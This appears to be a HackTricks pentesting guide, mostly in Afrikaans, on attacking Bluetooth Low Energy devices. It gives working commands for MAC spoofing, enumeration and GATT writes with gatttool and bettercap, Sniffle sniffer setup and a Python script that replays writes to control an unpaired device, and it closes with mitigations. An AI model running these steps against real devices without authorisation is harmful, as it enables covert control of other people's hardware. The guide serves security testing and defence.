# Pentesting BLE - Bluetooth Low Energy

{{#include ../../banners/hacktricks-training.md}}

## Inleiding

Beskikbaar sedert die Bluetooth 4.0-spesifikasie, gebruik BLE slegs 40 kanale wat die reeks 2400 tot 2483.5 MHz dek. In teenstelling gebruik tradisionele Bluetooth 79 kanale in dieselfde reeks.

BLE devices kommunikeer deur die stuur van **advertising packets** (**beacons**); hierdie pakkette maak die bestaan van die BLE-toestel aan ander nabygeleë toestelle bekend. Hierdie beacons **send data** soms ook.

Die luisterende toestel, ook 'n central device genoem, kan op 'n advertising packet reageer met 'n **SCAN request** wat spesifiek na die advertising-toestel gestuur word. Die **response** op daardie scan gebruik dieselfde struktuur as die **advertising** packet met bykomende inligting wat nie op die aanvanklike advertising request gepas het nie, soos die volledige toestelnaam.

![](<../../images/image (152).png>)

Die preamble byte sinkroniseer die frekwensie, terwyl die vier-byte access address 'n **connection identifier** is, wat gebruik word in scenario's waar veelvuldige toestelle probeer verbindings op dieselfde kanale te vestig. Daarna bevat die Protocol Data Unit (**PDU**) die **advertising data**. Daar is verskeie tipes PDU; die mees algemeen gebruikte is ADV_NONCONN_IND en ADV_IND. Toestelle gebruik die **ADV_NONCONN_IND** PDU-tipe as hulle **don’t accept connections**, sodat hulle slegs data in die advertising packet stuur. Toestelle gebruik **ADV_IND** as hulle **allow connections** en **stop sending advertising** packets sodra 'n **connection** gevestig is.

### GATT

Die **Generic Attribute Profile** (GATT) definieer hoe die **device should format and transfer data**. Wanneer jy 'n BLE-toestel se aanval-oppervlak ontleed, sal jy dikwels jou aandag op die GATT (of GATTs) konsentreer, omdat dit is hoe **device functionality gets triggered** en hoe data gestoor, gegroepeer en gewysig word. Die GATT lys 'n toestel se characteristics, descriptors, en services in 'n tabel as óf 16- of 32-bits waardes. 'n **characteristic** is 'n **data** waarde **sent** tussen die central device en peripheral. Hierdie characteristics kan **descriptors** hê wat **provide additional information about them**. **Characteristics** word dikwels **grouped** in **services** as hulle verwant is aan die uitvoering van 'n spesifieke aksie.

## Enumerasie
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool

**GATTool** laat toe om 'n **verbinding** met 'n ander toestel te **vestig**, daardie toestel se **characteristics** te lys, en sy attributes te lees en te skryf.\
GATTTool kan 'n interaktiewe shell begin met die `-I` opsie:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```
### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```
## Sniffing en aktief beheer van unpaired BLE-toestelle

Baie goedkoop BLE-perifere toestelle dwing nie pairing/bonding af nie. Sonder bonding word die Link Layer encryption nooit aangeskakel nie, so ATT/GATT-verkeer is in duidelike teks. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.

### Sniffing met Sniffle (CC26x2/CC1352)

Hardware: 'n Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group’s Sniffle firmware.

Installeer Sniffle en sy Wireshark extcap op Linux:
```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi
```
Flits Sonoff met Sniffle firmware (verseker dat jou seriële toestel ooreenstem, bv. /dev/ttyUSB0):
```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```
Vang in Wireshark via die Sniffle extcap en skuif vinnig na toestandveranderende skrywe deur te filter:
```text
_ws.col.info contains "Sent Write Command"
```
Dit beklemtoon ATT Write Commands vanaf die kliënt; die handle en value stem dikwels direk ooreen met toestelaksies (bv., write 0x01 to a buzzer/alert characteristic, 0x00 to stop).

Sniffle CLI vinnige voorbeelde:
```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```
Alternatiewe sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin werk ook. Op klein/goedkoop Nordic dongles oorskryf jy tipies die USB bootloader om die sniffer firmware te laai, so hou jy óf 'n toegewyde sniffer dongle óf benodig 'n J-Link/JTAG om die bootloader later te herstel.

### Aktiewe beheer via GATT

Sodra jy 'n writable characteristic handle en value uit die sniffed traffic geïdentifiseer het, koppel as enige central en voer dieselfde write uit:

- Met Nordic nRF Connect for Desktop (BLE app):
- Kies die nRF52/nRF52840 dongle, scan en verbind met die target.
- Blaai deur die GATT database, lokaliseer die target characteristic (het dikwels 'n vriendelike naam, bv. Alert Level).
- Voer 'n Write uit met die sniffed bytes (bv. 01 om te aktiveer, 00 om te stop).

- Automatiseer op Windows met 'n Nordic dongle deur Python + blatann te gebruik:
```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC

target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b:  # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```
### Operasionele notas en mitigasies

- Voorkeur: Sonoff+Sniffle op Linux vir robuuste kanaalspring en verbindingsopvolging. Hou 'n ekstra Nordic sniffer as rugsteun.
- Sonder pairing/bonding kan enige nabygeleë aanvaller writes waarneem en hul eie herspeel of saamstel na nie-geauthentiseerde writable characteristics.
- Mitigasies: vereis pairing/bonding en dwing enkripsie af; stel characteristic permissions om geauthentiseerde writes te vereis; minimaliseer nie-geauthentiseerde writable characteristics; valideer GATT ACLs met Sniffle/nRF Connect.

## Verwysings

- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)

{{#include ../../banners/hacktricks-training.md}}